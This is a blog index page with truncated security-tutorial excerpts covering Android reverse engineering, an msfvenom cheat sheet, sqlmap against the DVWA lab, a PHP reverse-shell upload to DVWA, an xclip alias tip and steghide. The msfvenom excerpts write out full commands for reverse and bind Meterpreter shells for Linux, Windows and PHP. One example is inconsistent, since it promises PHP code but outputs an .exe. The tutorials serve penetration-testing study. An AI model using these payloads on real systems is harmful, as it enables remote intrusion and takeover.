Posts

Showing posts from 2020

How To Reverse Engineer An Android Application

The very first rule of security for an Android mobile app is to never trust the client side. The client side is not an environment we control, so we should not rely on it by hard-coding or storing secrets that can disrupt our system. So the best way to secure your apps and avoid getting caught out by other developers and hackers is to reverse engineer the application yourself and fix the issues where possible. Many Android developers fail to realize that the Android app they build can be easily reverse engineered. If you are one of those developers who think hard-coding secret keys, or even storing them in a gradle file, will prevent them from going into the hands of hackers or other developers, you are wrong. So, let’s get started. For reverse engineering an application, we need a few things beforehand: a Java decompiler tool (I used JD-GUI in this article) to view the decompiled code, the dex2jar utility, the APK of the application, basic understanding of the Andro...

msfvenom Cheat Sheet

msfvenom is Metasploit's standalone payload generator and a replacement for msfpayload and msfencode. List switches/options: $ msfvenom --help List all payloads/modules: $ msfvenom -l <type> (or --list <type>) Here the types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all. Binaries Payloads: Linux Meterpreter Reverse Shell: $ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f elf > shell.elf Linux Bind Meterpreter Shell: $ msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > bind.elf Linux Bind Shell: $ msfvenom -p generic/shell_bind_tcp RHOST=<Remote IP Address> LPORT=<Local Port> -f elf > term.elf Windows Meterpreter Reverse TCP Shell: $ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Local IP Address> LPORT=<Local Port> -f exe > shell.exe Windows x64 Meterpreter Reverse TCP Shell: $ msfvenom -p wi...

Automate SQL Injection Exploitation with SqlMap - DVWA

Automate SQL Injection Exploitation with SqlMap - Damn Vulnerable Web App (DVWA) What is a SQL Injection? SQL injection is a technique often used to attack data-driven applications. It is considered a high-risk vulnerability because it can lead to full compromise of the web application. This is why, in almost all web application penetration testing engagements, the applications are checked for SQL injection flaws. A general and simple definition: an application is vulnerable to SQL injection when it allows you to interact with the database and to execute queries on it. This is done by passing crafted parameters/statements as input (for example through an HTML form) in an attempt to get the website to pass a newly formed SQL command to the database (e.g., dump the database contents to the attacker). SQL injection is a code injection technique that exploits a vulnerability in a web application's code....

Exploiting a Web Server - Using msfvenom generated PHP Web Payload

This exploit uses some of the file upload functions of the DVWA web site to demonstrate how to hack through the site itself. A hacker would use this type of vulnerability to gain access to web applications, servers, and data. We will start by creating pre-prepared PHP code that we will upload to the web server through the upload functionality provided by DVWA. For this exercise, I hosted the DVWA application in XAMPP on my host operating system. I will generate the PHP code using msfvenom on Kali Linux, which is hosted/run on Oracle VBOX. On Kali Linux, run the following command to generate the PHP Web Payload: $ msfvenom -p php/meterpreter/reverse_tcp LHOST=<Local IP> LPORT=<Local Port> -f raw > phpshell.php For example, $ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.2 LPORT=4444 -f exe > phpshell.exe Here, 192.168.0.2 is the IP address of the Kali server. It will generate fo...

How To Imitate (Replicate) pbcopy And pbpaste Commands On Linux

pbcopy on a Mac enables you to copy the standard input from a terminal window to your clipboard, so that you can paste it into other applications. This functionality is not available by default on Ubuntu/Linux, but it can easily be imitated using available Linux commands. You can imitate pbcopy and pbpaste on Ubuntu/Linux by using a similar tool called xclip, which does exactly the same. However, its syntax is a little complicated and it requires more options/switches. So, I am going to imitate it with pbcopy and pbpaste commands. Fortunately, since OS X and Linux are both *nix based, we can make use of the alias command to replicate the pbcopy and pbpaste functionality in Ubuntu/Linux. If you haven’t previously installed xclip, simply run the following command in your terminal: $ sudo apt-get install xclip -y Edit y...

Steganography using STEGHIDE

In this post, we will learn about "STEGHIDE". There are various steganography tools available in the digital world, but the difference between them is that they use a variety of algorithms to encrypt the data. Moreover, Steghide supports hiding data behind any image (jpg/jpeg/png/gif/bmp), audio (mp3/wav), excel, etc. What is "Steganography"? Steganography is composed of two Greek words: steganos, meaning "covered", and graphein, meaning "to write", which together mean "sheltered writing" or "concealed writing". It is a method that attempts to hide the existence of a message or communication. This idea of data hiding is not new; it has been used for centuries all across the world under different regimes. In digital steganography, electronic communications may incorporate steganographic coding inside of a transport layer, such as a document file, picture file, program etc. Message of communication origina...